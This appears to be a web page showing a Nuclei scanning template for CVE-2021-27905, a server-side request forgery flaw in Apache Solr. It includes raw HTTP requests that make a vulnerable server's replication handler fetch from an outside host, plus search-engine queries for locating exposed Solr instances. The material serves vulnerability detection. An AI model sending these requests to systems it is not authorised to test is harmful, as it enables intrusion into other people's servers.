Apache Solr <=8.8.1 - Server-Side Request Forgery

ID: CVE-2021-27905

Severity: critical

Author: hackergautam

Tags: cve2021,cve,apache,solr,ssrf

Description

Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at “/replication” under a Solr core) in Apache Solr has a “masterUrl” (also “leaderUrl” alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the “shards” parameter.

YAML Source

id: CVE-2021-27905

info:
  name: Apache Solr <=8.8.1 - Server-Side Request Forgery
  author: hackergautam
  severity: critical
  description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: This issue is resolved in Apache Solr 8.8.2 and later.
  reference:
    - https://www.anquanke.com/post/id/238201
    - https://ubuntu.com/security/CVE-2021-27905
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27905
    cwe-id: CWE-918
    epss-score: 0.94309
    epss-percentile: 0.99031
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query:
      - cpe:"cpe:2.3:a:apache:solr"
      - http.title:"apache solr"
      - http.title:"solr admin"
    fofa-query:
      - title="solr admin"
      - title="apache solr"
    google-query:
      - intitle:"apache solr"
      - intitle:"solr admin"
  tags: cve2021,cve,apache,solr,ssrf

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - '<str name="status">OK</str>'

    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 4a0a0047304502200d991d93dedecb954be6128d73088a4d0a32de5e4ecc56019a69df9b4559d4710221008dfdbec1aa3e241ea161763a0c962bc2cf901d9bafc332387e3470990b5624f0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-27905.yaml"

View on Github